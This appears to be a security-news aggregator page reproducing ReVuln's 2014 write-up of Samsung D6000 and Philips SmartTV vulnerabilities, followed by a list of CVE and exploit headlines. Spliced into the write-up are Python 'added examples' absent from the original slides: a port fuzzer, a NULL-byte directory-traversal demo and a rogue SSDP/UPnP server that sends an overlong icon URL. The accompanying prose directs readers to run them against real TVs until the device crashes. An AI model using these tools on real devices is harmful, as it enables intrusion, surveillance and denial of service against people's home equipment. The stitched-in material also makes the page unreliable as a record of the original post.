Reverse Engineering
SmartTV Insecurity - details of vulnerabilities affecting Samsung D6000 series and Philips (2013 models) [27 May 2014]

Reverse Engineering, 03.01.2019 15:23 | Source: revuln.blogspot.com
This post is derived from the slides (page 35) of our presentation at PHDays IV in 2014:

The following are the referenced videos:

Attack Surface

  • As you might have guessed, there are many different ways to attack a SmartTV
  • To get a better understanding, let's look at a real-world device
  • We will focus on only a subset of the device's attack surface
  • To do that we consider the following schema of a Philips SmartTV
...

Attack Surface - WiFi


The WiFi adapter of the TV acts as an access point listening for WiFi connections.
The Miracast protocol is composed of out-of-band WiFi packets, protocols and codecs.

A vulnerability in Miracast lets an attacker reach the TV from outside the house, by connecting directly to the TV's own access point instead of the home LAN.


 ...

Attack Surface - LAN

  • Most SmartTV issues are related to services exposed on the LAN:
      • UPnP
      • Video/audio services (such as DirectFB)
      • Various HTTP/HTTPS servers
      • Network remote controller
      • Media sharing
      • Status and information
  • The first thing to try on your SmartTV is an Nmap scan:
      • You will see a number of different TCP and UDP ports open
      • Some of them are waiting for you to connect :]
  • Sending junk data to these ports may already be enough to crash or reboot the TV, a useful starting point for further investigation
  • The TV also scans the LAN itself, so an attacker can exploit client-side vulnerabilities passively, by waiting for the TV to connect to him
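The "send junk to the open ports and watch what happens" step above, as an added example that is not part of the ReVuln slides. After an Nmap scan has produced the port list, the probe opens a fresh connection per payload, sends it and classifies what the service did; a port that suddenly refuses connections is the crash/reboot signal the slides mention. The target here is a constructed local echo service that drops connections on oversized input, so the script runs offline; the payloads, timeouts and the 1024-byte threshold are assumptions to adapt to a real device.

```python
import socket
import socketserver
import threading

# Constructed junk payloads: an HTTP-shaped request, a long run of 'A's and a
# block containing every byte value. Adjust to the service you are poking.
JUNK_PAYLOADS = [
    b"GET / HTTP/1.1\r\nHost: tv\r\n\r\n",
    b"A" * 4096,
    bytes(range(256)) * 8,
]


def probe_port(host, port, payloads=JUNK_PAYLOADS, timeout=2.0):
    """Open a fresh connection per payload, send it, and classify the outcome.

    Returns [(payload_index, outcome), ...] with outcome one of:
      'reply'   service answered with data
      'closed'  service closed the connection without answering
      'reset'   connection was reset
      'timeout' no answer within `timeout`
      'refused' port no longer accepts connections (crash/reboot signal)
    """
    results = []
    for i, payload in enumerate(payloads):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(payload)
                data = s.recv(4096)
                results.append((i, "reply" if data else "closed"))
        except ConnectionRefusedError:
            results.append((i, "refused"))
        except ConnectionResetError:
            results.append((i, "reset"))
        except (socket.timeout, OSError):
            results.append((i, "timeout"))
    return results


def service_survived(results):
    """True if the service still answered the last payload sent to it."""
    return bool(results) and results[-1][1] == "reply"


class FragileEcho(socketserver.BaseRequestHandler):
    """Constructed stand-in for a fragile TV daemon: echoes short input but
    silently drops the connection when it receives more than 1024 bytes."""

    def handle(self):
        self.request.settimeout(0.5)
        received = b""
        while True:                      # read until the client goes quiet
            try:
                chunk = self.request.recv(8192)
            except socket.timeout:
                break
            if not chunk:
                break
            received += chunk
        if len(received) > 1024:
            return                       # close without answering
        self.request.sendall(received)


def start_fragile_service():
    """Start the constructed service on an ephemeral port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FragileEcho)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo():
    """Probe the constructed service and return the per-payload outcomes."""
    srv, port = start_fragile_service()
    try:
        return probe_port("127.0.0.1", port)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for idx, outcome in demo():
        print(f"payload {idx}: {outcome}")
```

Against a real TV, run `probe_port` once per port from the Nmap output and re-run the scan afterwards: an outcome of 'closed' or 'reset' on one payload is a parser that gave up, while 'refused' on every later payload means the daemon (or the whole TV) went down.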


Real World Issues







Samsung #1 (1)

Date: 2012

Tested device: Samsung SmartTV D6000

Affected Service/Protocol: DMRND, an HTTP server listening on ports 52253 and 52396

Vulnerability: Directory traversal, which allows downloading any file on the device except special files such as those in /proc

Details: The server has a security check that only allows downloading files with a whitelisted extension (jpg, png, ...). To bypass the check the attacker appends a NULL byte followed by a whitelisted extension:
  • http://SERVER:52235/../../etc/passwd%00.png
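Why the NULL byte defeats the extension whitelist, as an added example that is not the TV's code or ReVuln's: the check runs on the decoded request string, which does end in ".png", but the C file API that later opens the file treats the string as NUL-terminated and so opens everything before the %00. The document root "/dlna/images" and the function names are assumptions chosen so that the two ".." segments from the slide land on /etc/passwd; the hardened variant shows the three checks that actually close the hole.

```python
import posixpath
from urllib.parse import unquote

WHITELIST = (".jpg", ".png")
BASE_DIR = "/dlna/images"   # assumed document root, two levels below "/"


def vulnerable_allowed(url_path):
    """The check as the slides describe it: extension test on the decoded
    Python string, which still contains the NUL byte and ends in '.png'."""
    decoded = unquote(url_path)
    return decoded.lower().endswith(WHITELIST)


def path_as_seen_by_fopen(url_path):
    """What a NUL-terminated C string API actually receives: everything
    up to the first 0x00 byte."""
    return unquote(url_path).split("\x00", 1)[0]


def vulnerable_open_target(url_path, base_dir=BASE_DIR):
    """File the vulnerable server would open, or None if the check rejects it."""
    if not vulnerable_allowed(url_path):
        return None
    # No confinement: the '..' segments walk out of the document root.
    return posixpath.normpath(base_dir + path_as_seen_by_fopen(url_path))


def safe_open_target(url_path, base_dir=BASE_DIR):
    """Hardened version: reject NUL bytes, normalise first, confine to
    base_dir, and only then test the extension of the final path."""
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    full = posixpath.normpath(posixpath.join(base_dir, decoded.lstrip("/")))
    # Confinement: after normalisation the path must still be inside base_dir.
    if posixpath.commonpath([full, base_dir]) != base_dir:
        return None
    if not full.lower().endswith(WHITELIST):
        return None
    return full


if __name__ == "__main__":
    req = "/../../etc/passwd%00.png"
    print("vulnerable server opens:", vulnerable_open_target(req))
    print("hardened server opens:  ", safe_open_target(req))
```

The order of the checks in `safe_open_target` matters: testing the extension before normalising lets "/x.png/../../etc/passwd" through on servers that strip the trailing component later, so the whitelist is applied to the path that will actually be opened.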




Samsung #1 (2)

  • Download the whole filesystem from the remote TV
  • Download the filesystems of all USB devices connected to it






Samsung #1 (3)


  • TV controller configuration file: it contains the parameters of the whitelisted remote controller
  • Configuration file used by our PC program: we only need to copy the above parameters into it
These fields (IP, MAC address and hostname) are not taken from the Ethernet/IP headers but are carried inside the protocol itself, so an attacker on the network can spoof them and impersonate the whitelisted TV controller





Samsung #1 (4)

  • Now we can control the TV while the victim is not watching
  • The attacker can install arbitrary malicious apps on the TV using the "develop" account






Samsung #2 (1)

Date: 2012

Tested device: Samsung SmartTV D6000

Affected Service/Protocol: DLNA client

Vulnerability: Buffer overflow, triggered as soon as the device tries to download the icon image associated with a DLNA host






Samsung #2 (2)

SSDP NOTIFY announcing a rogue media server on the LAN; the TV's DLNA client then fetches the device description at the Location URL:

NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Location: http://192.168.0.3:56923/test.xml
NTS: ssdp:alive
Cache-Control: max-age=1800
Server: UPnP/1.0 DLNADOC/1.50 Platinum/0.6.8.0-bb
USN: uuid:00000000-0000-0000-0000-000000000000::urn:schemas-upnp-org:device:MediaServer:1
NT: urn:schemas-upnp-org:device:MediaServer:1

Samsung #2 (3)

Device description served at that URL; the overlong icon URL is what overflows the buffer when the TV tries to download the icon:

<iconList>
    <icon>
        <mimetype>image/png</mimetype>
        <width>48</width>
        <height>48</height>
        <depth>32</depth>
        <url>/images/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [...]
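The two halves of the exchange above, as an added test harness that is not part of the ReVuln slides: the attacker's side sends the ssdp:alive NOTIFY, serves a device description whose icon URL is a run of 'a' bytes of chosen length, and records whether the TV came to fetch it. The TV's reaction (downloading the icon and failing on the overlong URL) is the device's bug; nothing here goes beyond the oversized URL. The multicast group, server string, UUID and the /test.xml path are the ones on the slides; the friendlyName, the XML boilerplate around <iconList> and the function names are assumptions. `simulate_tv_fetch` stands in for the TV so the whole thing runs offline.

```python
import socket
import threading
import urllib.request
import xml.etree.ElementTree as ET
from http.server import BaseHTTPRequestHandler, HTTPServer

SSDP_GROUP = ("239.255.255.250", 1900)
DEVICE_TYPE = "urn:schemas-upnp-org:device:MediaServer:1"
UUID = "uuid:00000000-0000-0000-0000-000000000000"
SERVER_STRING = "UPnP/1.0 DLNADOC/1.50 Platinum/0.6.8.0-bb"
UPNP_NS = "urn:schemas-upnp-org:device-1-0"


def build_notify(location):
    """The ssdp:alive NOTIFY from the slides, as bytes ready for sendto()."""
    lines = [
        "NOTIFY * HTTP/1.1",
        f"Host: {SSDP_GROUP[0]}:{SSDP_GROUP[1]}",
        f"Location: {location}",
        "NTS: ssdp:alive",
        "Cache-Control: max-age=1800",
        f"Server: {SERVER_STRING}",
        f"USN: {UUID}::{DEVICE_TYPE}",
        f"NT: {DEVICE_TYPE}",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def build_device_description(icon_url_len):
    """UPnP device description whose single icon URL is icon_url_len 'a's long."""
    icon_url = "/images/" + "a" * icon_url_len
    return f"""<?xml version="1.0"?>
<root xmlns="{UPNP_NS}">
  <specVersion><major>1</major><minor>0</minor></specVersion>
  <device>
    <deviceType>{DEVICE_TYPE}</deviceType>
    <friendlyName>test</friendlyName>
    <UDN>{UUID}</UDN>
    <iconList>
      <icon>
        <mimetype>image/png</mimetype>
        <width>48</width>
        <height>48</height>
        <depth>32</depth>
        <url>{icon_url}</url>
      </icon>
    </iconList>
  </device>
</root>
"""


def icon_urls(description_xml):
    """Parse a description the way a DLNA client would and return its icon URLs."""
    root = ET.fromstring(description_xml)
    return [u.text for u in root.findall(".//d:iconList/d:icon/d:url", {"d": UPNP_NS})]


class DescriptionHandler(BaseHTTPRequestHandler):
    icon_url_len = 4096          # set by serve_description()
    fetched_paths = []           # every path the client (the TV) asked for

    def do_GET(self):
        self.fetched_paths.append(self.path)
        body = build_device_description(self.icon_url_len).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/xml")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def serve_description(icon_url_len, bind_host="0.0.0.0", advertise_host=None):
    """Start the HTTP side on a background thread; returns (server, Location URL).
    advertise_host is the LAN address the TV should connect back to."""
    DescriptionHandler.icon_url_len = icon_url_len
    srv = HTTPServer((bind_host, 0), DescriptionHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host = advertise_host or bind_host
    return srv, f"http://{host}:{srv.server_address[1]}/test.xml"


def announce(location, ttl=2):
    """Multicast the NOTIFY; every DLNA client on the segment sees it."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
        s.sendto(build_notify(location), SSDP_GROUP)


def simulate_tv_fetch(location, timeout=5):
    """What the TV does first: GET the description and collect its icon URLs."""
    with urllib.request.urlopen(location, timeout=timeout) as resp:
        return icon_urls(resp.read())


if __name__ == "__main__":
    srv, loc = serve_description(4096, advertise_host="192.168.0.3")  # slides' address
    announce(loc)
    print("announced", loc, "- watch DescriptionHandler.fetched_paths")
```

On a real LAN pass your own address as advertise_host, call `announce` and leave the server running; a TV that takes the bait shows up in `DescriptionHandler.fetched_paths` with "/test.xml" and then a GET for the icon path. Vary icon_url_len downward to find the smallest length that still makes the D6000 fall over.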

Samsung #3

Date: 2012

Tested device: Samsung SmartTV D6000

Vulnerability: Persistent endless loop (denial of service)

Details: The controller packet contains a string used to identify the controller itself. A malformed string triggers an endless loop. The only way to recover is to access the device's service mode before the reboot.


Philips Miracast (1)

  • Found in 2014
  • ALL Philips TV 2013 models are affected
  • Probably silently exploitable since summer 2013
  • No PIN
  • No authorization request
  • Hardcoded fixed password: "Miracast" :)
  • Full access to the TV's services, just as from the LAN
  • Exploitation of a directory traversal in JointSpace
  • Abuse of the available services
  • Let's check what we can do...

Philips Miracast (2)

  • Controlling the TV remotely

Philips Miracast (3)

  • Sending audio and video to the TV... the TV is talking to you!


Philips Miracast (4)

  • Stealing configuration files and cookies via a directory traversal, public since September 2013 but still unfixed



Conclusion

  • SmartTVs are insecure
  • SmartTVs are a perfect tool for "monitoring" a specific target, a person or even a company (TVs are everywhere)
  • Exploiting them usually requires being on the LAN or some user interaction
  • Currently it is difficult to find a single vulnerability that owns many TV models, so you must focus on the model used by your target


Hacking Quest For Glory III

Reverse Engineering, 03.01.2019 14:57 | Source: reddit.com
submitted by /u/speckz

Pwnables (exploit-mes) for beginners

Reverse Engineering, 03.01.2019 11:43 | Source: reddit.com
submitted by /u/joxeankoret

dsym_obfuscate: Obfuscates dynamic symbol table

Reverse Engineering, 03.01.2019 10:08 | Source: reddit.com
submitted by /u/perror

Vuln: Adobe Acrobat and Reader CVE-2018-19725 Security Bypass Vulnerability

Exploits, 03.01.2019 01:00 | Source: securityfocus.com

Microsoft Windows 10: vulnerability allows privilege escalation

Exploits, 03.01.2019 01:00 | Source: cert-bund.de
CB-K19/0005: Microsoft Windows 10: vulnerability allows privilege escalation

Vuln: Schneider Electric Pro-face GP-Pro CVE-2018-7832 Arbitrary Code Execution Vulnerability

Exploits, 03.01.2019 01:00 | Source: securityfocus.com

Vuln: Adobe Acrobat and Reader CVE-2018-16011 Arbitrary Code Execution Vulnerability

Exploits, 03.01.2019 01:00 | Source: securityfocus.com

CVE-2019-3701

Exploits, 03.01.2019 01:00 | Source: cvedetails.com
An issue was discovered in can_can_gw_rcv in net/can/gw.c in the Linux kernel through 4.19.13. The CAN frame modification rules allow bitwise logical operations that can also be applied to the can_dlc field. Because of a missing check, the CAN drivers may write arbitrary content beyond the data registers in the CAN controller's I/O memory when processing can-gw manipulated outgoing frames. This is related to cgw_csum_xor_rel. An unprivileged user can trigger a system crash (general protection fault). (CVSS:0.0) (Last Update:2019-01-03)

CVE-2019-5005

Exploits, 03.01.2019 01:00 | Source: cvedetails.com
An issue was discovered in Foxit Reader and PhantomPDF before 9.4 on Windows. They allowed Denial of Service (application crash) via image data, because two bytes are written to the end of the allocated memory without judging whether this will cause corruption. (CVSS:0.0) (Last Update:2019-01-03)

CVE-2019-3905

Exploits, 03.01.2019 01:00 | Source: cvedetails.com
Zoho ManageEngine ADSelfService Plus 5.x before build 5703 has SSRF. (CVSS:0.0) (Last Update:2019-01-03)

CVE-2019-3575

Exploits, 03.01.2019 01:00 | Source: cvedetails.com
Sqla_yaml_fixtures 0.9.1 allows local users to execute arbitrary python code via the fixture_text argument in sqla_yaml_fixtures.load. (CVSS:0.0) (Last Update:2019-01-03)

CVE-2019-5007

Exploits, 03.01.2019 01:00 | Source: cvedetails.com
An issue was discovered in Foxit Reader and PhantomPDF before 9.4 on Windows. It is an Out-of-Bounds Read Information Disclosure and crash due to a NULL pointer dereference when reading TIFF data during TIFF parsing. (CVSS:0.0) (Last Update:2019-01-03)

CVE-2019-5006

Exploits, 03.01.2019 01:00 | Source: cvedetails.com
An issue was discovered in Foxit Reader and PhantomPDF before 9.4 on Windows. It is a NULL pointer dereference during PDF parsing. (CVSS:0.0) (Last Update:2019-01-03)

Zurmo 2.3.4 Cross Site Scripting

PoC, 03.01.2019 00:22 | Source: packetstormsecurity.com
Zurmo version 2.3.4 suffers from multiple cross site scripting vulnerabilities.

Methodology for System Image Assessments

Reverse Engineering, 02.01.2019 21:43 | Source: reddit.com
submitted by /u/xVIoct

Analysis of Neutrino Bot Sample

Reverse Engineering, 02.01.2019 17:51 | Source: reddit.com
submitted by /u/peppermalware

Long-Range Familial Searching Forensics

Reverse Engineering, 02.01.2019 16:29 | Source: schneier.com
Good article on using long-range familial searching -- basically, DNA matching of distant relatives -- as a police forensics tool....

Vtiger CRM 7.1.0 Remote Code Execution

PoC, 02.01.2019 16:20 | Source: cxsecurity.com
Topic: Vtiger CRM 7.1.0 Remote Code Execution Risk: Medium Text:# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution # Date: 2018-12-27 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) ...

#0daytoday #Vtiger CRM 7.1.0 - Remote Code Execution Exploit [webapps #exploits #0day #Exploit]

PoC, 02.01.2019 15:15 | Source: 0day.today

#0daytoday #WordPress Adicon Server 1.2 Plugin - selectedPlace SQL Injection Vulnerability [#0day #Exploit]

PoC, 02.01.2019 15:15 | Source: 0day.today

Gusto - Recipes Management v1.5.1 System sqli Vulnerability

Exploits, 02.01.2019 13:20 | Source: cxsecurity.com
inurl:"recipes/search?category_id=1&title=wajidareeb"

Gusto - Recipes Management v1.5.1 System SQL Injection Vulnerability

Exploits, 02.01.2019 13:19 | Source: cxsecurity.com
/profile/1-gusto

applepie: A hypervisor for Bochs and for fuzzing

Reverse Engineering, 02.01.2019 11:55 | Source: reddit.com
submitted by /u/gamozolabs

Gusto - Recipes Management v1.5.1 System Backdoor Account Vulnerability

Exploits, 02.01.2019 07:44 | Source: cxsecurity.com
/profile/1-gusto

JustBoil.me Images Upload Vulnerability

Exploits, 02.01.2019 07:44 | Source: cxsecurity.com
/assets/tiny_mce/plugins/jbimages/dialog-v4.htm /

Logo & Web Design by LogoBee XSS Vulnerability

Exploits, 02.01.2019 07:44 | Source: cxsecurity.com
intext:"Logo & Web Design by LogoBee"

PHP Kernel Writeup with Instructions (Reversing)

Reverse Engineering, 02.01.2019 07:22 | Source: reddit.com
submitted by /u/binaryswap

ImpressCMS 1.3.10 Cross Site Scripting

PoC, 02.01.2019 06:22 | Source: packetstormsecurity.com
ImpressCMS version 1.3.10 suffers from multiple cross site scripting vulnerabilities.

EZ CD Audio Converter 8.0.7 Denial Of Service

PoC, 02.01.2019 05:02 | Source: packetstormsecurity.com
EZ CD Audio Converter version 8.0.7 suffers from a denial of service vulnerability.

WordPress Adicon Server 1.2 SQL Injection

PoC, 02.01.2019 04:44 | Source: packetstormsecurity.com
WordPress Adicon Server version 1.2 suffers from a remote SQL injection vulnerability.